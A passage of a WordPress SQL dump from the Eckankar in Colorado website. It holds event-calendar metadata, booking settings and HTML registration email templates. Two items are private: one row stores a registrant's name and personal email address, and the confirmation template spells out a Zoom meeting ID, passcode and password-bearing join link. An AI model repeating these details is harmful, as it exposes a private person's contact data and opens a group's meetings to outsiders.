7,268730,'mec_allday','0'),(186358,268730,'one_occurrence','0'),(186359,268730,'mec_hide_time','0'),(186360,268730,'mec_hide_end_time','0'),(186361,268730,'mec_comment',''),(186362,268730,'mec_timezone','global'),(186363,268730,'mec_countdown_method','global'),(186364,268730,'mec_public','1'),(186365,268730,'mec_start_date','2023-09-10'),(186366,268730,'mec_start_time_hour','10'),(186367,268730,'mec_start_time_minutes','30'),(186368,268730,'mec_start_time_ampm','AM'),(186369,268730,'mec_start_day_seconds','37800'),(186370,268730,'mec_end_date','2023-09-10'),(186371,268730,'mec_end_time_hour','11'),(186372,268730,'mec_end_time_minutes','30'),(186373,268730,'mec_end_time_ampm','AM'),(186374,268730,'mec_end_day_seconds','41400'),(186375,268730,'mec_repeat_status','0'),(186376,268730,'mec_repeat_type',''),(186377,268730,'mec_repeat_interval','1'),(186378,268730,'mec_repeat_end',''),(186379,268730,'mec_repeat_end_at_occurrences',''),(186380,268730,'mec_repeat_end_at_date',''),(186381,268730,'mec_advanced_days','a:0:{}'),(186382,268730,'mec_in_days',''),(186383,268730,'mec_not_in_days',''),(186384,268730,'mec_hourly_schedules','a:0:{}'),(186385,268730,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192385,269128,'_field_653','wtknscountry@gmail.com'),(192384,269128,'_field_652','GLeason'),(192383,269128,'_field_654','Karly'),(192382,269127,'_seq_num','19'),(192381,269127,'_form_id','61'),(186386,268730,'mec_tickets','a:1:{i:1;a:20:{s:4:\"name\";s:27:\"ECK Light and Sound Service\";s:22:\"ticket_start_time_hour\";s:0:\"\";s:24:\"ticket_start_time_minute\";s:1:\"0\";s:22:\"ticket_start_time_ampm\";s:0:\"\";s:20:\"ticket_end_time_hour\";s:2:\"01\";s:22:\"ticket_end_time_minute\";s:1:\"0\";s:20:\"ticket_end_time_ampm\";s:2:\"AM\";s:11:\"description\";s:13:\"Register Here\";s:19:\"private_description\";s:0:\"\";s:5:\"price\";s:1:\"0\";s:11:\"price_label\";s:0:\"\";s:5:\"limit\";s:0:\"\";s:9:\"unlimited\";s:1:\"1\";s:5:\"seats\";s:1:\"1\";s:14:\"minimum_ticket\";s:1:\"1\";s:14:\"maximum_ticket\";s:0:\"\";s:18:\"stop_selling_value\";s:1:\"0\";s:17:\"stop_selling_type\";s:4:\"hour\";s:5:\"dates\";a:0:{}s:2:\"id\";i:1;}}'),(186387,268730,'mec_fees_global_inheritance','1'),(186388,268730,'mec_fees','a:0:{}'),(186389,268730,'mec_ticket_variations_global_inheritance','1'),(186390,268730,'mec_ticket_variations','a:0:{}'),(186391,268730,'mec_reg_fields_global_inheritance','1'),(186392,268730,'mec_reg_fields','a:0:{}'),(186393,268730,'mec_bfixed_fields','a:0:{}'),(186394,268730,'mec_op','a:0:{}'),(186395,268730,'mec_fields','a:0:{}'),(186396,268730,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:10295:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding-right: 0px; padding-left: 0px;\" align=\"center\"><img style=\"outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; clear: both; display: inline-block !important; border: none; height: auto; float: none; width: 100%; max-width: 480px;\" title=\"\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/04/email-img-registration-600-5.jpg\" alt=\"\" width=\"480\" align=\"middle\" border=\"0\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<p><span style=\"font-size: 20pt; font-weight: bold;\">Event Registration Confirmation</span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 17px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b><span style=\"color: #f28a27;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b style=\"color: #f28a27;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 26px; font-size: 16px;\"><b style=\"color: #f28a27;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 24px; color: #f28a27; font-weight: 600;\">Zoom Login Information:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 16px; font-size: 16px;\"><b>Meeting ID: </b>834 9746 0655<br />\r\n<b>Passcode:</b> 867156</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 15px;\"><a href=\"https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09\">https://us02web.zoom.us/j/83497460655?pwd=QUhmSC9NZHg1YlVwZWFtc0JjZDEzdz09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 14px; font-size: 16px;\">See you there!</p>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:8399:\"<table id=\"u_body\" style=\"border-collapse: collapse; table-layout: fixed; border-spacing: 0; mso-table-lspace: 0pt; mso-table-rspace: 0pt; vertical-align: top; min-width: 320px; margin: 0 auto; background-color: #f1f1f1; width: 100%;\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr style=\"vertical-align: top;\">\r\n<td style=\"word-break: break-word; border-collapse: collapse !important; vertical-align: top;\">\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"height: 100%; width: 100% !important;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border: 0px solid transparent;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif; background-color: #efefef;\" align=\"left\">\r\n<div>\r\n<div style=\"margin: 0px; line-height: 140%; text-align: center; word-wrap: break-word; font-size: 28px; font-weight: bold; color: #f28a27;\">\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px;\">Admin Notification</span></div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #ffffff; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 1px solid #CCC;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div style=\"text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n<div style=\"text-align: center;\"><br />\r\n<span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span>\r\n<p> <span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></p>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #e8e8e8; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div>\r\n<p style=\"padding: 20px; font-size: 16px; line-height: 22px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\"><span style=\"font-size: 14pt;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"u-row-container\" style=\"padding: 0px; background-color: transparent;\">\r\n<div class=\"u-row\" style=\"margin: 0 auto; min-width: 320px; max-width: 500px; overflow-wrap: break-word; word-wrap: break-word; word-break: break-word; background-color: transparent;\">\r\n<div style=\"border-collapse: collapse; display: table; width: 100%; height: 100%; background-color: transparent;\">\r\n<div class=\"u-col u-col-100\" style=\"max-width: 320px; min-width: 500px; display: table-cell; vertical-align: top;\">\r\n<div style=\"background-color: #6e6e6e; height: 100%; width: 100% !important; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px;\">\r\n<div style=\"box-sizing: border-box; height: 100%; padding: 0px; border-radius: 0px; -webkit-border-radius: 0px; -moz-border-radius: 0px; border: 0px solid transparent;\">\r\n<table style=\"font-family: arial,helvetica,sans-serif;\" role=\"presentation\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"overflow-wrap: break-word; word-break: break-word; padding: 10px; font-family: arial,helvetica,sans-serif;\" align=\"left\">\r\n<div>\r\n<div style=\"text-align: center; font-family: arial, helvetica, sans-serif;\"><a href=\"https://www.facebook.com/people/Eckankar-in-Colorado/100067829705562/\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /></a>\r\n<p style=\"text-align: center; font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado<br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\" target=\"_blank\" rel=\"noopener\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></p>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\";}}'),(186397,268730,'mec_event_status','EventScheduled'),(186398,268730,'mec_moved_online_link',''),(186399,268730,'mec_cancelled_reason',''),(186400,268730,'mec_display_cancellation_reason_in_single_page',''),(186401,268730,'protect_children',''),(186402,268730,'passster_activate_global_protection',NULL),(186403,268730,'passster_activate_protection',NULL),(186404,268730,'passster_protection_type','password'),(186405,268730,'boldgrid_hide_page_title','0'),(186406,268730,'_oembed_ace4d65561aa575fe8833c60d61f4161','{{unknown}}'),(186407,268730,'boldgrid_in_page_containers','1'),(186408,268730,'_thumbnail_id','268936'),(186409,268730,'_wp_old_date','2022-04-30'),(186410,268730,'passster_area_shortcode',''),(186411,268730,'mec_cost_auto_calculate','0'),(186412,268730,'mec_style_per_event','global'),(186413,268730,'mec_trailer_url',''),(186414,268730,'mec_trailer_title',''),(186415,268730,'mec_start_datetime','2023-09-10 10:30 AM'),(186416,268730,'mec_end_datetime','2023-09-10 11:30 AM'),(186417,268730,'mec_sequence','3'),(186418,268730,'mec_event_gallery','a:0:{}'),(186419,268730,'mec_related_events','a:0:{}'),(186420,268730,'mec_banner','a:0:{}'),(186423,268730,'_dp_original','268679'),(186422,268730,'mec_fields_1',''),(186424,268730,'_edit_lock','1694352022:2'),(186425,268730,'_edit_last','2'),(193141,269160,'mec_start_date','2023-10-12'),(193142,269160,'mec_start_time_hour','6'),(193143,269160,'mec_start_time_minutes','30'),(193144,269160,'mec_start_time_ampm','PM'),(193145,269160,'mec_start_day_seconds','66600'),(193146,269160,'mec_end_date','2023-10-12'),(193147,269160,'mec_end_time_hour','7'),(193148,269160,'mec_end_time_minutes','30'),(193149,269160,'mec_end_time_ampm','PM'),(193150,269160,'mec_end_day_seconds','70200'),(193151,269160,'mec_repeat_status','0'),(193152,269160,'mec_repeat_type',''),(193153,269160,'mec_repeat_interval','1'),(193154,269160,'mec_repeat_end',''),(193155,269160,'mec_repeat_end_at_occurrences','9'),(193156,269160,'mec_repeat_end_at_date',''),(193157,269160,'mec_advanced_days','a:0:{}'),(193158,269160,'mec_in_days',''),(193159,269160,'mec_not_in_days',''),(193160,269160,'mec_hourly_schedules','a:0:{}'),(193161,269160,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(192856,269146,'boldgrid_in_page_containers','1'),(192857,269146,'passster_area_shortcode',''),(192858,269146,'_wp_old_date','2023-01-14'),(192859,269146,'mec_cost_auto_calculate','0'),(192860,269146,'mec_style_per_event','global'),(192861,269146,'mec_trailer_url',''),(192862,269146,'mec_trailer_title',''),(192863,269146,'mec_start_datetime','2023-10-06 10:00 AM'),(192864,269146,'mec_end_datetime','2023-10-06 05:00 PM'),(192865,269146,'mec_sequence','25'),(192866,269146,'mec_event_gallery','a:0:{}'),(192867,269146,'mec_related_events','a:0:{}'),(192868,269146,'mec_banner','a:0:{}'),(192871,269146,'_dp_original','269140'),(192870,269146,'_thumbnail_id','269141'),(192872,269146,'_edit_lock','1696277462:2'),(192873,269146,'_edit_last','2'),(192874,269147,'mec_color',''),(192875,269147,'mec_location_id','122'),(192876,269147,'mec_dont_show_map','0'),(192877,269147,'mec_organizer_id','1'),(192878,269147,'mec_read_more',''),(192879,269147,'mec_more_info',''),(192880,269147,'mec_more_info_title',''),(192881,269147,'mec_more_info_target','_self'),(192882,269147,'mec_cost',''),(192883,269147,'mec_currency','a:0:{}'),(192884,269147,'mec_additional_organizer_ids','a:0:{}'),(192885,269147,'mec_additional_location_ids','a:0:{}'),(192886,269147,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-10-29\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-10-29\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(192887,269147,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(192888,269147,'mec_certain_weekdays','a:0:{}'),(192889,269147,'mec_allday','0'),(192890,269147,'one_occurrence','0'),(192891,269147,'mec_hide_time','0'),(192892,269147,'mec_hide_end_time','0'),(192893,269147,'mec_comment',''),(192894,269147,'mec_timezone','global'),(192895,269147,'mec_countdown_method','global'),(192896,269147,'mec_public','1'),(192897,269147,'mec_start_date','2023-10-29'),(192898,269147,'mec_start_time_hour','10'),(192899,269147,'mec_start_time_minutes','30'),(192900,269147,'mec_start_time_ampm','AM'),(192901,269147,'mec_start_day_seconds','37800'),(192902,269147,'mec_end_date','2023-10-29'),(192903,269147,'mec_end_time_hour','11'),(192904,269147,'mec_end_time_minutes','30'),(192905,269147,'mec_end_time_ampm','AM'),(192906,269147,'mec_end_day_seconds','41400'),(192907,269147,'mec_repeat_status','0'),(192908,269147,'mec_repeat_type',''),(192909,269147,'mec_repeat_interval','1'),(192910,269147,'mec_repeat_end',''),(192911,269147,'mec_repeat_end_at_occurrences','9'),(192912,269147,'mec_repeat_end_at_date',''),(192913,269147,'mec_advanced_days','a:0:{}')